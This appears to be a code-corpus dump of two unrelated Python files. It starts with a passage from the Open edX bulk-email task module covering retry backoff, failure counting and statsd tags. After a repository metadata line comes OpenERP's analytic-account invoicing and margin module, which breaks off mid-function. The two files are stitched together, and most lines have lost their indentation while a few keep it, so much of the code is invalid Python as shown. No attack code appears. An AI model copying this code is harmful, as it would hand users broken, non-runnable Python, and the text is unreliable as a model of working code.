dog_stats_api.increment('course_email.error', tags=[_statsd_tag(course_title)])
num_pending = len(to_list)
log.exception('Task %s: email with id %d caused send_course_email task to fail with "fatal" exception. %d emails unsent.',
task_id, email_id, num_pending)
# Update counters with progress to date, counting unsent emails as failures,
# and set the state to FAILURE:
subtask_status.increment(failed=num_pending, state=FAILURE)
return subtask_status, exc
except Exception as exc:
# Errors caught here cause the email to be retried. The entire task is actually retried
# without popping the current recipient off of the existing list.
# These are unexpected errors. Since they might be due to a temporary condition that might
# succeed on retry, we give them a retry.
dog_stats_api.increment('course_email.limited_retry', tags=[_statsd_tag(course_title)])
log.exception('Task %s: email with id %d caused send_course_email task to fail with unexpected exception. Generating retry.',
task_id, email_id)
# Increment the "retried_withmax" counter, update other counters with progress to date,
# and set the state to RETRY:
subtask_status.increment(retried_withmax=1, state=RETRY)
return _submit_for_retry(
entry_id, email_id, to_list, global_email_context, exc, subtask_status, skip_retry_max=False
)
else:
# All went well. Update counters with progress to date,
# and set the state to SUCCESS:
subtask_status.increment(state=SUCCESS)
# Successful completion is marked by an exception value of None.
return subtask_status, None
finally:
# Clean up at the end.
connection.close()
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
def _submit_for_retry(entry_id, email_id, to_list, global_email_context, current_exception, subtask_status, skip_retry_max=False):
"""
Helper function to requeue a task for retry, using the new version of arguments provided.
Inputs are the same as for running a task, plus two extra indicating the state at the time of retry.
These include the `current_exception` that the task encountered that is causing the retry attempt,
and the `subtask_status` that is to be returned. A third extra argument `skip_retry_max`
indicates whether the current retry should be subject to a maximum test.
Returns a tuple of two values:
* First value is a dict which represents current progress. Keys are:
'task_id' : id of subtask. This is used to pass task information across retries.
'attempted' : number of attempts -- should equal succeeded plus failed
'succeeded' : number that succeeded in processing
'skipped' : number that were not processed.
'failed' : number that failed during processing
'retried_nomax' : number of times the subtask has been retried for conditions that
should not have a maximum count applied
'retried_withmax' : number of times the subtask has been retried for conditions that
should have a maximum count applied
'state' : celery state of the subtask (e.g. QUEUING, PROGRESS, RETRY, FAILURE, SUCCESS)
* Second value is an exception returned by the innards of the method. If the retry was
successfully submitted, this value will be the RetryTaskError that retry() returns.
Otherwise, it (ought to be) the current_exception passed in.
"""
task_id = subtask_status.task_id
log.info("Task %s: Successfully sent to %s users; failed to send to %s users (and skipped %s users)",
task_id, subtask_status.succeeded, subtask_status.failed, subtask_status.skipped)
# Calculate time until we retry this task (in seconds):
# The value for max_retries is increased by the number of times an "infinite-retry" exception
# has been retried. We want the regular retries to trigger max-retry checking, but not these
# special retries. So we count them separately.
max_retries = _get_current_task().max_retries + subtask_status.retried_nomax
base_delay = _get_current_task().default_retry_delay
if skip_retry_max:
# once we reach five retries, don't increase the countdown further.
retry_index = min(subtask_status.retried_nomax, 5)
exception_type = 'sending-rate'
# if we have a cap, after all, apply it now:
if hasattr(settings, 'BULK_EMAIL_INFINITE_RETRY_CAP'):
retry_cap = settings.BULK_EMAIL_INFINITE_RETRY_CAP + subtask_status.retried_withmax
max_retries = min(max_retries, retry_cap)
else:
retry_index = subtask_status.retried_withmax
exception_type = 'transient'
# Skew the new countdown value by a random factor, so that not all
# retries are deferred by the same amount.
countdown = ((2 ** retry_index) * base_delay) * random.uniform(.75, 1.25)
log.warning('Task %s: email with id %d not delivered due to %s error %s, retrying send to %d recipients in %s seconds (with max_retry=%s)',
task_id, email_id, exception_type, current_exception, len(to_list), countdown, max_retries)
# we make sure that we update the InstructorTask with the current subtask status
# *before* actually calling retry(), to be sure that there is no race
# condition between this update and the update made by the retried task.
update_subtask_status(entry_id, task_id, subtask_status)
# Now attempt the retry. If it succeeds, it returns a RetryTaskError that
# needs to be returned back to Celery. If it fails, we return the existing
# exception.
try:
retry_task = send_course_email.retry(
args=[
entry_id,
email_id,
to_list,
global_email_context,
subtask_status.to_dict(),
],
exc=current_exception,
countdown=countdown,
max_retries=max_retries,
throw=True,
)
raise retry_task
except RetryTaskError as retry_error:
# If the retry call is successful, update with the current progress:
log.exception(u'Task %s: email with id %d caused send_course_email task to retry.',
task_id, email_id)
return subtask_status, retry_error
except Exception as retry_exc:
# If there are no more retries, because the maximum has been reached,
# we expect the original exception to be raised. We catch it here
# (and put it in retry_exc just in case it's different, but it shouldn't be),
# and update status as if it were any other failure. That means that
# the recipients still in the to_list are counted as failures.
log.exception(u'Task %s: email with id %d caused send_course_email task to fail to retry. To list: %s',
task_id, email_id, [i['email'] for i in to_list])
num_failed = len(to_list)
subtask_status.increment(failed=num_failed, state=FAILURE)
return subtask_status, retry_exc
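
# Editorial illustration (not part of the upstream module): the backoff arithmetic from
# _submit_for_retry isolated with fixed, hypothetical inputs. With base_delay=30 seconds
# and retry_index=3 the midpoint is 2**3 * 30 = 240 seconds, jittered by +/-25%.
def _example_retry_countdown(retry_index=3, base_delay=30):
    """Reproduce the countdown computation used when rescheduling a subtask."""
    return ((2 ** retry_index) * base_delay) * random.uniform(.75, 1.25)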
def _statsd_tag(course_title):
"""
Prefix the tag we will use for DataDog.
The tag also gets modified by our dogstats_wrapper code.
"""
return u"course_email:{0}".format(course_title)
|
aaltinisik/OCBAltinkaya | refs/heads/8.0 | addons/account_analytic_analysis/account_analytic_analysis.py | 38 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from dateutil.relativedelta import relativedelta
import datetime
import logging
import time
from openerp.osv import osv, fields
import openerp.tools
from openerp.tools.translate import _
from openerp.addons.decimal_precision import decimal_precision as dp
_logger = logging.getLogger(__name__)
class account_analytic_invoice_line(osv.osv):
_name = "account.analytic.invoice.line"
def _amount_line(self, cr, uid, ids, prop, unknow_none, unknow_dict, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.quantity * line.price_unit
if line.analytic_account_id.pricelist_id:
cur = line.analytic_account_id.pricelist_id.currency_id
res[line.id] = self.pool.get('res.currency').round(cr, uid, cur, res[line.id])
return res
_columns = {
'product_id': fields.many2one('product.product','Product',required=True),
'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account', ondelete='cascade'),
'name': fields.text('Description', required=True),
'quantity': fields.float('Quantity', required=True),
'uom_id': fields.many2one('product.uom', 'Unit of Measure',required=True),
'price_unit': fields.float('Unit Price', required=True),
'price_subtotal': fields.function(_amount_line, string='Sub Total', type="float",digits_compute= dp.get_precision('Account')),
}
_defaults = {
'quantity' : 1,
}
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', partner_id=False, price_unit=False, pricelist_id=False, company_id=None, context=None):
context = context or {}
uom_obj = self.pool.get('product.uom')
company_id = company_id or False
local_context = dict(context, company_id=company_id, force_company=company_id, pricelist=pricelist_id)
if not product:
return {'value': {'price_unit': 0.0}, 'domain':{'product_uom':[]}}
if partner_id:
part = self.pool.get('res.partner').browse(cr, uid, partner_id, context=local_context)
if part.lang:
local_context.update({'lang': part.lang})
result = {}
res = self.pool.get('product.product').browse(cr, uid, product, context=local_context)
price = False
if price_unit is not False:
price = price_unit
elif pricelist_id:
price = res.price
if price is False:
price = res.list_price
if not name:
name = self.pool.get('product.product').name_get(cr, uid, [res.id], context=local_context)[0][1]
if res.description_sale:
name += '\n'+res.description_sale
result.update({'name': name or False,'uom_id': uom_id or res.uom_id.id or False, 'price_unit': price})
res_final = {'value':result}
if result['uom_id'] != res.uom_id.id:
selected_uom = uom_obj.browse(cr, uid, result['uom_id'], context=local_context)
new_price = uom_obj._compute_price(cr, uid, res.uom_id.id, res_final['value']['price_unit'], result['uom_id'])
res_final['value']['price_unit'] = new_price
return res_final
class account_analytic_account(osv.osv):
_name = "account.analytic.account"
_inherit = "account.analytic.account"
def _analysis_all(self, cr, uid, ids, fields, arg, context=None):
dp = 2
res = dict([(i, {}) for i in ids])
parent_ids = tuple(ids) # We don't want consolidation for each of these fields because these complex computations are resource-greedy.
accounts = self.browse(cr, uid, ids, context=context)
for f in fields:
if f == 'user_ids':
cr.execute('SELECT MAX(id) FROM res_users')
max_user = cr.fetchone()[0]
if parent_ids:
cr.execute('SELECT DISTINCT("user") FROM account_analytic_analysis_summary_user ' \
'WHERE account_id IN %s AND unit_amount <> 0.0', (parent_ids,))
result = cr.fetchall()
else:
result = []
for id in ids:
res[id][f] = [int((id * max_user) + x[0]) for x in result]
elif f == 'month_ids':
if parent_ids:
cr.execute('SELECT DISTINCT(month_id) FROM account_analytic_analysis_summary_month ' \
'WHERE account_id IN %s AND unit_amount <> 0.0', (parent_ids,))
result = cr.fetchall()
else:
result = []
for id in ids:
res[id][f] = [int(id * 1000000 + int(x[0])) for x in result]
elif f == 'last_worked_invoiced_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, MAX(date) \
FROM account_analytic_line \
WHERE account_id IN %s \
AND invoice_id IS NOT NULL \
GROUP BY account_analytic_line.account_id;", (parent_ids,))
for account_id, sum in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = sum
elif f == 'ca_to_invoice':
for id in ids:
res[id][f] = 0.0
res2 = {}
for account in accounts:
cr.execute("""
SELECT product_id, sum(amount), user_id, to_invoice, sum(unit_amount), product_uom_id, line.name
FROM account_analytic_line line
LEFT JOIN account_analytic_journal journal ON (journal.id = line.journal_id)
WHERE account_id = %s
AND journal.type != 'purchase'
AND invoice_id IS NULL
AND to_invoice IS NOT NULL
GROUP BY product_id, user_id, to_invoice, product_uom_id, line.name""", (account.id,))
res[account.id][f] = 0.0
for product_id, price, user_id, factor_id, qty, uom, line_name in cr.fetchall():
price = -price
if product_id:
price = self.pool.get('account.analytic.line')._get_invoice_price(cr, uid, account, product_id, user_id, qty, context)
factor = self.pool.get('hr_timesheet_invoice.factor').browse(cr, uid, factor_id, context=context)
res[account.id][f] += price * qty * (100-factor.factor or 0.0) / 100.0
# sum both results per account_id
for id in ids:
res[id][f] = round(res.get(id, {}).get(f, 0.0), dp) + round(res2.get(id, 0.0), 2)
elif f == 'last_invoice_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute ("SELECT account_analytic_line.account_id, \
DATE(MAX(account_invoice.date_invoice)) \
FROM account_analytic_line \
JOIN account_invoice \
ON account_analytic_line.invoice_id = account_invoice.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_line.invoice_id IS NOT NULL \
GROUP BY account_analytic_line.account_id",(parent_ids,))
for account_id, lid in cr.fetchall():
res[account_id][f] = lid
elif f == 'last_worked_date':
for id in ids:
res[id][f] = False
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, MAX(date) \
FROM account_analytic_line \
WHERE account_id IN %s \
AND invoice_id IS NULL \
GROUP BY account_analytic_line.account_id",(parent_ids,))
for account_id, lwd in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = lwd
elif f == 'hours_qtt_non_invoiced':
for id in ids:
res[id][f] = 0.0
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, COALESCE(SUM(unit_amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_journal.type='general' \
AND invoice_id IS NULL \
AND to_invoice IS NOT NULL \
GROUP BY account_analytic_line.account_id;",(parent_ids,))
for account_id, sua in cr.fetchall():
if account_id not in res:
res[account_id] = {}
res[account_id][f] = round(sua, dp)
for id in ids:
res[id][f] = round(res[id][f], dp)
elif f == 'hours_quantity':
for id in ids:
res[id][f] = 0.0
if parent_ids:
cr.execute("SELECT account_analytic_line.account_id, COALESCE(SUM(unit_amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND account_analytic_journal.type='general' \
GROUP BY account_analytic_line.account_id",(parent_ids,))
ff = cr.fetchall()
for account_id, hq in ff:
if account_id not in res:
res[account_id] = {}
res[account_id][f] = round(hq, dp)
for id in ids:
res[id][f] = round(res[id][f], dp)
elif f == 'ca_theorical':
# TODO Take care of pricelist and purchase !
for id in ids:
res[id][f] = 0.0
# Warning:
# This computation does not take the pricelist into account;
# it just uses list_price.
if parent_ids:
cr.execute("""SELECT account_analytic_line.account_id AS account_id, \
COALESCE(SUM((account_analytic_line.unit_amount * pt.list_price) \
- (account_analytic_line.unit_amount * pt.list_price \
* hr.factor)), 0.0) AS somme
FROM account_analytic_line \
LEFT JOIN account_analytic_journal \
ON (account_analytic_line.journal_id = account_analytic_journal.id) \
JOIN product_product pp \
ON (account_analytic_line.product_id = pp.id) \
JOIN product_template pt \
ON (pp.product_tmpl_id = pt.id) \
JOIN account_analytic_account a \
ON (a.id=account_analytic_line.account_id) \
JOIN hr_timesheet_invoice_factor hr \
ON (hr.id=a.to_invoice) \
WHERE account_analytic_line.account_id IN %s \
AND a.to_invoice IS NOT NULL \
AND account_analytic_journal.type IN ('purchase', 'general')
GROUP BY account_analytic_line.account_id""",(parent_ids,))
for account_id, sum in cr.fetchall():
res[account_id][f] = round(sum, dp)
return res
def _ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
res_final = {}
child_ids = tuple(ids) # We don't want consolidation for each of these fields because these complex computations are resource-greedy.
for i in child_ids:
res[i] = 0.0
if not child_ids:
return res
if child_ids:
#Search all invoice lines not in cancelled state that refer to this analytic account
inv_line_obj = self.pool.get("account.invoice.line")
inv_lines = inv_line_obj.search(cr, uid, ['&', ('account_analytic_id', 'in', child_ids), ('invoice_id.state', 'not in', ['draft', 'cancel']), ('invoice_id.type', 'in', ['out_invoice', 'out_refund'])], context=context)
for line in inv_line_obj.browse(cr, uid, inv_lines, context=context):
if line.invoice_id.type == 'out_refund':
res[line.account_analytic_id.id] -= line.price_subtotal
else:
res[line.account_analytic_id.id] += line.price_subtotal
for acc in self.browse(cr, uid, res.keys(), context=context):
res[acc.id] = res[acc.id] - (acc.timesheet_ca_invoiced or 0.0)
res_final = res
return res_final
def _total_cost_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
res_final = {}
child_ids = tuple(ids) # We don't want consolidation for each of these fields because these complex computations are resource-greedy.
for i in child_ids:
res[i] = 0.0
if not child_ids:
return res
if child_ids:
cr.execute("""SELECT account_analytic_line.account_id, COALESCE(SUM(amount), 0.0) \
FROM account_analytic_line \
JOIN account_analytic_journal \
ON account_analytic_line.journal_id = account_analytic_journal.id \
WHERE account_analytic_line.account_id IN %s \
AND amount<0 \
GROUP BY account_analytic_line.account_id""",(child_ids,))
for account_id, sum in cr.fetchall():
res[account_id] = round(sum,2)
res_final = res
return res_final
def _remaining_hours_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.quantity_max != 0:
res[account.id] = account.quantity_max - account.hours_quantity
else:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _remaining_hours_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = max(account.hours_qtt_est - account.timesheet_ca_invoiced, account.ca_to_invoice)
return res
def _hours_qtt_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.hours_quantity - account.hours_qtt_non_invoiced
if res[account.id] < 0:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _revenue_per_hour_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.hours_qtt_invoiced == 0:
res[account.id]=0.0
else:
res[account.id] = account.ca_invoiced / account.hours_qtt_invoiced
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _real_margin_rate_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
if account.ca_invoiced == 0:
res[account.id]=0.0
elif account.total_cost != 0.0:
res[account.id] = -(account.real_margin / account.total_cost) * 100
else:
res[account.id] = 0.0
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _fix_price_to_invoice_calc(self, cr, uid, ids, name, arg, context=None):
sale_obj = self.pool.get('sale.order')
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
sale_ids = sale_obj.search(cr, uid, [('project_id','=', account.id), ('state', '=', 'manual')], context=context)
for sale in sale_obj.browse(cr, uid, sale_ids, context=context):
res[account.id] += sale.amount_untaxed
for invoice in sale.invoice_ids:
if invoice.state != 'cancel':
res[account.id] -= invoice.amount_untaxed
return res
def _timesheet_ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None):
lines_obj = self.pool.get('account.analytic.line')
res = {}
inv_ids = []
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = 0.0
line_ids = lines_obj.search(cr, uid, [('account_id','=', account.id), ('invoice_id','!=',False), ('invoice_id.state', 'not in', ['draft', 'cancel']), ('to_invoice','!=', False), ('journal_id.type', '=', 'general'), ('invoice_id.type', 'in', ['out_invoice', 'out_refund'])], context=context)
for line in lines_obj.browse(cr, uid, line_ids, context=context):
if line.invoice_id not in inv_ids:
inv_ids.append(line.invoice_id)
if line.invoice_id.type == 'out_refund':
res[account.id] -= line.invoice_id.amount_untaxed
else:
res[account.id] += line.invoice_id.amount_untaxed
return res
def _remaining_ca_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = max(account.amount_max - account.ca_invoiced, account.fix_price_to_invoice)
return res
def _real_margin_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.ca_invoiced + account.total_cost
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _theorical_margin_calc(self, cr, uid, ids, name, arg, context=None):
res = {}
for account in self.browse(cr, uid, ids, context=context):
res[account.id] = account.ca_theorical + account.total_cost
for id in ids:
res[id] = round(res.get(id, 0.0),2)
return res
def _is_overdue_quantity(self, cr, uid, ids, fieldnames, args, context=None):
result = dict.fromkeys(ids, 0)
for record in self.browse(cr, uid, ids, context=context):
if record.quantity_max > 0.0:
result[record.id] = int(record.hours_quantity > record.quantity_max)
else:
result[record.id] = 0
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
result = set()
for line in self.pool.get('account.analytic.line').browse(cr, uid, ids, context=context):
result.add(line.account_id.id)
return list(result)
def _get_total_estimation(self, account):
tot_est = 0.0
if account.fix_price_invoices:
tot_est += account.amount_max
if account.invoice_on_timesheets:
tot_est += account.hours_qtt_est
return tot_est
def _get_total_invoiced(self, account):
total_invoiced = 0.0
if account.fix_price_invoices:
total_invoiced += account.ca_invoiced
if account.invoice_on_timesheets:
total_invoiced += account.timesheet_ca_invoiced
return total_invoiced
def _get_total_remaining(self, account):
total_remaining = 0.0
if account.fix_price_invoices:
total_remaining += account.remaining_ca
if account.invoice_on_timesheets:
total_remaining += account.remaining_hours_to_invoice
return total_remaining
def _get_total_toinvoice(self, account):
total_toinvoice = 0.0
if account.fix_price_invoices:
total_toinvoice += account.fix_price_to_invoice
if account.invoice_on_timesheets:
total_toinvoice += account.ca_to_invoice
return total_toinvoice
def _sum_of_fields(self, cr, uid, ids, name, arg, context=None):
res = dict([(i, {}) for i in ids])
for account in self.browse(cr, uid, ids, context=context):
res[account.id]['est_total'] = self._get_total_estimation(account)
res[account.id]['invoiced_total'] = self._get_total_invoiced(account)
res[account.id]['remaining_total'] = self._get_total_remaining(account)
res[account.id]['toinvoice_total'] = self._get_total_toinvoice(account)
return res
_columns = {
'is_overdue_quantity' : fields.function(_is_overdue_quantity, method=True, type='boolean', string='Overdue Quantity',
store={
'account.analytic.line' : (_get_analytic_account, None, 20),
'account.analytic.account': (lambda self, cr, uid, ids, c=None: ids, ['quantity_max'], 10),
}),
'ca_invoiced': fields.function(_ca_invoiced_calc, type='float', string='Invoiced Amount',
help="Total customer invoiced amount for this account.",
digits_compute=dp.get_precision('Account')),
'total_cost': fields.function(_total_cost_calc, type='float', string='Total Costs',
help="Total of costs for this account. It includes real costs (from invoices) and indirect costs, like time spent on timesheets.",
digits_compute=dp.get_precision('Account')),
'ca_to_invoice': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Uninvoiced Amount',
help="If invoice from analytic account, the remaining amount you can invoice to the customer based on the total costs.",
digits_compute=dp.get_precision('Account')),
'ca_theorical': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Theoretical Revenue',
help="Based on the costs you had on the project, what would have been the revenue if all these costs have been invoiced at the normal sale price provided by the pricelist.",
digits_compute=dp.get_precision('Account')),
'hours_quantity': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Total Worked Time',
help="Number of time you spent on the analytic account (from timesheet). It computes quantities on all journal of type 'general'."),
'last_invoice_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Last Invoice Date',
help="If invoice from the costs, this is the date of the latest invoiced."),
'last_worked_invoiced_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Date of Last Invoiced Cost',
help="If invoice from the costs, this is the date of the latest work or cost that have been invoiced."),
'last_worked_date': fields.function(_analysis_all, multi='analytic_analysis', type='date', string='Date of Last Cost/Work',
help="Date of the latest work done on this account."),
'hours_qtt_non_invoiced': fields.function(_analysis_all, multi='analytic_analysis', type='float', string='Uninvoiced Time',
help="Number of time (hours/days) (from journal of type 'general') that can be invoiced if you invoice based on analytic account."),
'hours_qtt_invoiced': fields.function(_hours_qtt_invoiced_calc, type='float', string='Invoiced Time',
help="Number of time (hours/days) that can be invoiced plus those that already have been invoiced."),
'remaining_hours': fields.function(_remaining_hours_calc, type='float', string='Remaining Time',
help="Computed using the formula: Maximum Time - Total Worked Time"),
'remaining_hours_to_invoice': fields.function(_remaining_hours_to_invoice_calc, type='float', string='Remaining Time',
help="Computed using the formula: Expected on timesheets - Total invoiced on timesheets"),
        'fix_price_to_invoice': fields.function(_fix_price_to_invoice_calc, type='float', string='Fixed Price to Invoice',
            help="Sum of quotations for this contract."),
        'timesheet_ca_invoiced': fields.function(_timesheet_ca_invoiced_calc, type='float', string='Invoiced on Timesheets',
            help="Sum of timesheet lines invoiced for this contract."),
'remaining_ca': fields.function(_remaining_ca_calc, type='float', string='Remaining Revenue',
help="Computed using the formula: Max Invoice Price - Invoiced Amount.",
digits_compute=dp.get_precision('Account')),
'revenue_per_hour': fields.function(_revenue_per_hour_calc, type='float', string='Revenue per Time (real)',
help="Computed using the formula: Invoiced Amount / Total Time",
digits_compute=dp.get_precision('Account')),
'real_margin': fields.function(_real_margin_calc, type='float', string='Real Margin',
help="Computed using the formula: Invoiced Amount - Total Costs.",
digits_compute=dp.get_precision('Account')),
'theorical_margin': fields.function(_theorical_margin_calc, type='float', string='Theoretical Margin',
help="Computed using the formula: Theoretical Revenue - Total Costs",
digits_compute=dp.get_precision('Account')),
'real_margin_rate': fields.function(_real_margin_rate_calc, type='float', string='Real Margin Rate (%)',
help="Computes using the formula: (Real Margin / Total Costs) * 100.",
digits_compute=dp.get_precision('Account')),
'fix_price_invoices' : fields.boolean('Fixed Price'),
'invoice_on_timesheets' : fields.boolean("On Timesheets"),
'month_ids': fields.function(_analysis_all, multi='analytic_analysis', type='many2many', relation='account_analytic_analysis.summary.month', string='Month'),
'user_ids': fields.function(_analysis_all, multi='analytic_analysis', type="many2many", relation='account_analytic_analysis.summary.user', string='User'),
'hours_qtt_est': fields.float('Estimation of Hours to Invoice'),
'est_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Estimation"),
'invoiced_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Invoiced"),
'remaining_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total Remaining", help="Expectation of remaining income for this contract. Computed as the sum of remaining subtotals which, in turn, are computed as the maximum between '(Estimation - Invoiced)' and 'To Invoice' amounts"),
'toinvoice_total' : fields.function(_sum_of_fields, type="float",multi="sum_of_all", string="Total to Invoice", help=" Sum of everything that could be invoiced for this contract."),
'recurring_invoice_line_ids': fields.one2many('account.analytic.invoice.line', 'analytic_account_id', 'Invoice Lines', copy=True),
'recurring_invoices' : fields.boolean('Generate recurring invoices automatically'),
'recurring_rule_type': fields.selection([
('daily', 'Day(s)'),
('weekly', 'Week(s)'),
('monthly', 'Month(s)'),
('yearly', 'Year(s)'),
            ], 'Recurrency', help="Invoices automatically repeat at the specified interval."),
        'recurring_interval': fields.integer('Repeat Every', help="Repeat every (Days/Weeks/Months/Years)"),
'recurring_next_date': fields.date('Date of Next Invoice'),
}
_defaults = {
'recurring_interval': 1,
'recurring_next_date': lambda *a: time.strftime('%Y-%m-%d'),
'recurring_rule_type':'monthly'
}
def open_sale_order_lines(self,cr,uid,ids,context=None):
if context is None:
context = {}
sale_ids = self.pool.get('sale.order').search(cr,uid,[('project_id','=',context.get('search_default_project_id',False)),('partner_id','in',context.get('search_default_partner_id',False))])
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Sales Order Lines to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
'view_type': 'form',
'view_mode': 'tree,form',
'context': context,
'domain' : [('order_id','in',sale_ids)],
'res_model': 'sale.order.line',
'nodestroy': True,
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = super(account_analytic_account, self).on_change_template(cr, uid, ids, template_id, date_start=date_start, context=context)
template = self.browse(cr, uid, template_id, context=context)
if not ids:
res['value']['fix_price_invoices'] = template.fix_price_invoices
res['value']['amount_max'] = template.amount_max
if not ids:
res['value']['invoice_on_timesheets'] = template.invoice_on_timesheets
res['value']['hours_qtt_est'] = template.hours_qtt_est
if template.to_invoice.id:
res['value']['to_invoice'] = template.to_invoice.id
if template.pricelist_id.id:
res['value']['pricelist_id'] = template.pricelist_id.id
if not ids:
invoice_line_ids = []
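            # Each (0, 0, vals) triple below is the ORM one2many command that creates
            # a new recurring invoice line with the given values when the record is saved.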
for x in template.recurring_invoice_line_ids:
invoice_line_ids.append((0, 0, {
'product_id': x.product_id.id,
'uom_id': x.uom_id.id,
'name': x.name,
'quantity': x.quantity,
'price_unit': x.price_unit,
'analytic_account_id': x.analytic_account_id and x.analytic_account_id.id or False,
}))
res['value']['recurring_invoices'] = template.recurring_invoices
res['value']['recurring_interval'] = template.recurring_interval
res['value']['recurring_rule_type'] = template.recurring_rule_type
res['value']['recurring_invoice_line_ids'] = invoice_line_ids
return res
def onchange_recurring_invoices(self, cr, uid, ids, recurring_invoices, date_start=False, context=None):
value = {}
if date_start and recurring_invoices:
value = {'value': {'recurring_next_date': date_start}}
return value
def cron_account_analytic_account(self, cr, uid, context=None):
context = dict(context or {})
remind = {}
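        # remind is built as {manager_id: {reminder_key: {partner: [accounts]}}} and is
        # rendered per manager by the e-mail template sent at the end of this cron.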
def fill_remind(key, domain, write_pending=False):
base_domain = [
('type', '=', 'contract'),
('partner_id', '!=', False),
('manager_id', '!=', False),
('manager_id.email', '!=', False),
]
base_domain.extend(domain)
accounts_ids = self.search(cr, uid, base_domain, context=context, order='name asc')
accounts = self.browse(cr, uid, accounts_ids, context=context)
for account in accounts:
if write_pending:
account.write({'state' : 'pending'})
remind_user = remind.setdefault(account.manager_id.id, {})
remind_type = remind_user.setdefault(key, {})
                remind_type.setdefault(account.partner_id, []).append(account)
# Already expired
fill_remind("old", [('state', 'in', ['pending'])])
# Expires now
fill_remind("new", [('state', 'in', ['draft', 'open']), '|', '&', ('date', '!=', False), ('date', '<=', time.strftime('%Y-%m-%d')), ('is_overdue_quantity', '=', True)], True)
# Expires in less than 30 days
fill_remind("future", [('state', 'in', ['draft', 'open']), ('date', '!=', False), ('date', '<', (datetime.datetime.now() + datetime.timedelta(30)).strftime("%Y-%m-%d"))])
context['base_url'] = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
context['action_id'] = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_analytic_analysis', 'action_account_analytic_overdue_all')[1]
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'account_analytic_analysis', 'account_analytic_cron_email_template')[1]
for user_id, data in remind.items():
context["data"] = data
_logger.debug("Sending reminder to uid %s", user_id)
self.pool.get('email.template').send_mail(cr, uid, template_id, user_id, force_send=True, context=context)
return True
def onchange_invoice_on_timesheets(self, cr, uid, ids, invoice_on_timesheets, context=None):
if not invoice_on_timesheets:
return {'value': {'to_invoice': False}}
result = {'value': {'use_timesheets': True}}
try:
to_invoice = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'hr_timesheet_invoice', 'timesheet_invoice_factor1')
result['value']['to_invoice'] = to_invoice[1]
except ValueError:
pass
return result
def hr_to_invoice_timesheets(self, cr, uid, ids, context=None):
domain = [('invoice_id','=',False),('to_invoice','!=',False), ('journal_id.type', '=', 'general'), ('account_id', 'in', ids)]
names = [record.name for record in self.browse(cr, uid, ids, context=context)]
name = _('Timesheets to Invoice of %s') % ','.join(names)
return {
'type': 'ir.actions.act_window',
'name': name,
